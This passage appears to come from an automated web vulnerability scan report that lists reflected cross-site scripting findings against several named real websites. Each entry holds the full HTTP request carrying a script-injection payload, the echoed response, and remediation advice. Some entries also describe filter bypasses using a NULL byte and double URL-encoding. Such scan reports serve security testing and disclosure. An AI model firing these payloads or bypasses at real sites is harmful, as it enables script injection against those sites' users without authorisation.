<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form method="get" action="/search/opensearch5245c"style="x:expression(alert(1))"443bfa630be/generic.xml">
...[SNIP]...

6.42. http://www.townnews.com/shared-content/e-edition/display.php [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews.com
Path:   /shared-content/e-edition/display.php

Issue detail

The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c1e"style%3d"x%3aexpression(alert(1))"22493627c80 was submitted in the pub parameter. This input was echoed as 21c1e"style="x:expression(alert(1))"22493627c80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shared-content/e-edition/display.php?pubdate=2010-09-01&page=A1&pub=21c1e"style%3d"x%3aexpression(alert(1))"22493627c80 HTTP/1.1
Host: www.townnews.com
Proxy-Connection: keep-alive
Referer: http://www.townnews.com/shared-content/e-edition/menu.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; PHPSESSID=c3c252a7ad706c2168a0b2594434613a

Response

HTTP/1.1 200 OK
Server: WWW
Content-Type: text/html
Date: Sat, 14 May 2011 22:35:08 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
X-PHP-Engine: enabled
Real-Hostname: townnews.com
Content-Length: 334

<frameset rows="*,20" cols="*" frameborder="0">
<frame name="e-edition-archive" src="/content/e-edition/2010/09/01/21c1e"style="x:expression(alert(1))"22493627c80/A1.pdf" marginheight="0" marginwidth="0">
...[SNIP]...

6.43. http://www.townnews.com/shared-content/e-edition/display.php [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews.com
Path:   /shared-content/e-edition/display.php

Issue detail

The value of the pub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f91f3"style%3d"x%3aexpression(alert(1))"c4f8fb3cf8b was submitted in the pub parameter. This input was echoed as f91f3"style="x:expression(alert(1))"c4f8fb3cf8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /shared-content/e-edition/display.php?pubdate=2010-09-01&page=A1&pub=f91f3"style%3d"x%3aexpression(alert(1))"c4f8fb3cf8b HTTP/1.1
Host: www.townnews.com
Proxy-Connection: keep-alive
Referer: http://www.townnews.com/shared-content/e-edition/menu.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; PHPSESSID=c3c252a7ad706c2168a0b2594434613a

Response

HTTP/1.1 200 OK
Server: WWW
Content-Type: text/html
Date: Sat, 14 May 2011 22:48:06 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
X-PHP-Engine: enabled
Real-Hostname: townnews.com
Content-Length: 334

<frameset rows="*,20" cols="*" frameborder="0">
<frame name="e-edition-archive" src="/content/e-edition/2010/09/01/f91f3"style="x:expression(alert(1))"c4f8fb3cf8b/A1.pdf" marginheight="0" marginwidth="0">
...[SNIP]...

6.44. http://www.townnews365.com/search/opensearch/generic.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /search/opensearch/generic.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4978"style%3d"x%3aexpression(alert(1))"e2eeb644230 was submitted in the REST URL parameter 2. This input was echoed as c4978"style="x:expression(alert(1))"e2eeb644230 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/opensearchc4978"style%3d"x%3aexpression(alert(1))"e2eeb644230/generic.xml HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.1.10.1305412213

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3837396
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:30:49 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3249
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 39118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href="ht
...[SNIP]...
<form method="get" action="/search/opensearchc4978"style="x:expression(alert(1))"e2eeb644230/generic.xml">
...[SNIP]...

6.45. http://www.townnews365.com/search/results/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /search/results/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a33"style%3d"x%3aexpression(alert(1))"aead80cd8e9 was submitted in the REST URL parameter 2. This input was echoed as 53a33"style="x:expression(alert(1))"aead80cd8e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search/results53a33"style%3d"x%3aexpression(alert(1))"aead80cd8e9/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3838756
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:46:45 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4939
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 39024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href="ht
...[SNIP]...
<form method="get" action="/search/results53a33"style="x:expression(alert(1))"aead80cd8e9/">
...[SNIP]...

6.46. http://www.townnews365.com/users/login/ [referer_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /users/login/

Issue detail

The value of the referer_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3d18'%3balert(1)//60272508631 was submitted in the referer_url parameter. This input was echoed as a3d18';alert(1)//60272508631 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /users/login/?referer_url=/user-generated_solutions/user_account_contributions/a3d18'%3balert(1)//60272508631 HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.4.10.1305412213

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4014240
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:32:57 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4056
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 38695


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...
<input type="hidden" name="referer_url" value="/user-generated_solutions/user_account_contributions/a3d18';alert(1)//60272508631?login_success=true" />
...[SNIP]...

6.47. http://www.townnews365.com/users/login/ [referer_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.townnews365.com
Path:   /users/login/

Issue detail

The value of the referer_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1970"style%3d"x%3aexpression(alert(1))"19ba92e4f1b was submitted in the referer_url parameter. This input was echoed as c1970"style="x:expression(alert(1))"19ba92e4f1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /users/login/?referer_url=/user-generated_solutions/user_account_contributions/c1970"style%3d"x%3aexpression(alert(1))"19ba92e4f1b HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.4.10.1305412213

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4014328
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:32:57 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4074
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp13
Content-Length: 38752


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...
<a class="signup-link" href="https://townnews365-dot-com.bloxcms.com/users/signup/?referer_url=/user-generated_solutions/user_account_contributions/c1970"style="x:expression(alert(1))"19ba92e4f1b">
...[SNIP]...

6.48. http://www.vccircle.com/news/startups [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vccircle.com
Path:   /news/startups

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40204"><script>alert(1)</script>60021ff941 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/startups?40204"><script>alert(1)</script>60021ff941=1 HTTP/1.1
Host: www.vccircle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS50517945bd869367850ec6eccb963d0e=n5qdbfa776ito6bcf2tcnq44n6; __gads=ID=896293f29ede560c:T=1305396258:S=ALNI_Mbog5FLCqbXD1j1YETDTBBe7FFp0g; __utmz=36096679.1305396261.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36096679.1306617388.1305396258.1305396258.1305396258.1; __utmc=36096679; __qca=P0-925679482-1305396374957

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:41:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 14 May 2011 18:41:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!--[if lt IE 8]>
   <script
...[SNIP]...
<a href="/news/startups?40204"><script>alert(1)</script>60021ff941=1">
...[SNIP]...

6.49. http://www.zoosk.com/d/dating2/35/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoosk.com
Path:   /d/dating2/35/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aedc"><script>alert(1)</script>a2c0a8dbd4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/dating21aedc"><script>alert(1)</script>a2c0a8dbd4a/35/ HTTP/1.1
Host: www.zoosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=1, pre-check=2
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO PSA OUR"
Date: Sat, 14 May 2011 14:14:40 GMT
Keep-Alive: timeout=10, max=997
Expires: Thu, 11 Nov 1982 05:00:00 GMT
Pragma: no-cache
Connection: close
Set-Cookie: z_tu1=YToyOntzOjQ6Imhhc2giO3M6MzI6IjRiODkxM2I3MzA2M2U4YmMyMTQ0YTcyNzhlNGVjZGFmIjtzOjQ6ImRhdGEiO3M6MjIwOiJZVG94TWpwN2FUb3dPMDQ3Y3pveE9pSmxJanRPTzNNNk1Ub2laeUk3Y3pvek1qb2lNR0ZpTnpKbE9EZGpZekZpWmpVNVlUVTJNREl5Wm1VeVlXUmlObVl3WTJFaU8zTTZNVG9pY3lJN1RqdHpPakU2SW00aU8wNDdjem94T2lKaklqdE9PM002TVRvaWRDSTdUanR6T2pJNklteGhJanRPTzNNNk1qb2liRzhpTzA0N2N6b3hPaUpwSWp0cE9qRTdjem94T2lKdklqdE9PM002TVRvaWVpSTdUanQ5Ijt9; path=/; domain=.zoosk.com
Set-Cookie: z_tu1=YToyOntzOjQ6Imhhc2giO3M6MzI6IjRiODkxM2I3MzA2M2U4YmMyMTQ0YTcyNzhlNGVjZGFmIjtzOjQ6ImRhdGEiO3M6MjIwOiJZVG94TWpwN2FUb3dPMDQ3Y3pveE9pSmxJanRPTzNNNk1Ub2laeUk3Y3pvek1qb2lNR0ZpTnpKbE9EZGpZekZpWmpVNVlUVTJNREl5Wm1VeVlXUmlObVl3WTJFaU8zTTZNVG9pY3lJN1RqdHpPakU2SW00aU8wNDdjem94T2lKaklqdE9PM002TVRvaWRDSTdUanR6T2pJNklteGhJanRPTzNNNk1qb2liRzhpTzA0N2N6b3hPaUpwSWp0cE9qRTdjem94T2lKdklqdE9PM002TVRvaWVpSTdUanQ5Ijt9; path=/; domain=.zoosk.com
Content-Length: 10900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.zoosk.com/d/dating21aedc"><script>alert(1)</script>a2c0a8dbd4a/35/" />
...[SNIP]...

6.50. http://www.zoosk.com/d/dating2/35/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zoosk.com
Path:   /d/dating2/35/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 463a5"><script>alert(1)</script>4eab7f9a29a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/dating2/35463a5"><script>alert(1)</script>4eab7f9a29a/ HTTP/1.1
Host: www.zoosk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=1, pre-check=2
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO PSA OUR"
Date: Sat, 14 May 2011 14:14:54 GMT
Keep-Alive: timeout=10, max=999
Expires: Thu, 11 Nov 1982 05:00:00 GMT
Pragma: no-cache
Connection: close
Set-Cookie: z_tu1=YToyOntzOjQ6Imhhc2giO3M6MzI6IjRiODkxM2I3MzA2M2U4YmMyMTQ0YTcyNzhlNGVjZGFmIjtzOjQ6ImRhdGEiO3M6MjIwOiJZVG94TWpwN2FUb3dPMDQ3Y3pveE9pSmxJanRPTzNNNk1Ub2laeUk3Y3pvek1qb2lOVGxrTkRFMFpXSTVaVFF6WW1VMFkyWTJNVFl6WW1ZNFpEazVObU0xWmpRaU8zTTZNVG9pY3lJN1RqdHpPakU2SW00aU8wNDdjem94T2lKaklqdE9PM002TVRvaWRDSTdUanR6T2pJNklteGhJanRPTzNNNk1qb2liRzhpTzA0N2N6b3hPaUpwSWp0cE9qRTdjem94T2lKdklqdE9PM002TVRvaWVpSTdUanQ5Ijt9; path=/; domain=.zoosk.com
Set-Cookie: z_tu1=YToyOntzOjQ6Imhhc2giO3M6MzI6IjRiODkxM2I3MzA2M2U4YmMyMTQ0YTcyNzhlNGVjZGFmIjtzOjQ6ImRhdGEiO3M6MjIwOiJZVG94TWpwN2FUb3dPMDQ3Y3pveE9pSmxJanRPTzNNNk1Ub2laeUk3Y3pvek1qb2lOVGxrTkRFMFpXSTVaVFF6WW1VMFkyWTJNVFl6WW1ZNFpEazVObU0xWmpRaU8zTTZNVG9pY3lJN1RqdHpPakU2SW00aU8wNDdjem94T2lKaklqdE9PM002TVRvaWRDSTdUanR6T2pJNklteGhJanRPTzNNNk1qb2liRzhpTzA0N2N6b3hPaUpwSWp0cE9qRTdjem94T2lKdklqdE9PM002TVRvaWVpSTdUanQ5Ijt9; path=/; domain=.zoosk.com
Content-Length: 11611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.zoosk.com/d/dating2/35463a5"><script>alert(1)</script>4eab7f9a29a/" />
...[SNIP]...

6.51. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad6bb%2522%253balert%25281%2529%252f%252f365b3b1c98c was submitted in the Referer HTTP header. This input was echoed as ad6bb";alert(1)//365b3b1c98c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ad6bb%2522%253balert%25281%2529%252f%252f365b3b1c98c

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96343

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
b="";addthis_onload = [ function() { document.getElementById('filt').focus(); } ];addthis_url="http://www.google.com/search?hl=en&q=ad6bb%2522%253balert%25281%2529%252f%252f365b3b1c98c";addthis_title="ad6bb";alert(1)//365b3b1c98c - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

6.52. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fa38"><script>alert(1)</script>72571cc404d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5fa38"><script>alert(1)</script>72571cc404d

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96385

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=5fa38"><script>alert(1)</script>72571cc404d" />
...[SNIP]...

6.53. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 3da8e<script>alert(1)</script>09e684370db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=3da8e<script>alert(1)</script>09e684370db

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96367

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
</script>09e684370db";addthis_title="3da8e<script>alert(1)</script>09e684370db - 1 search";
var services = { '100zakladok':"100zakladok", '2tag':"2 Tag", '2linkme':"2linkme", '7live7':"7Live7.com", 'a1webmarks':"A1-Webmarks", 'a97abi':"A97abi", 'addio':"Add.io", 'adfty':"Adfty"
...[SNIP]...

6.54. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 5d362<script>alert(1)</script>cdc158780ac was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fadsafeprotected.com%2F&jsref=&rnd=1305396607919 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://adsafeprotected.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==5d362<script>alert(1)</script>cdc158780ac

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sat, 14 May 2011 18:10:11 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


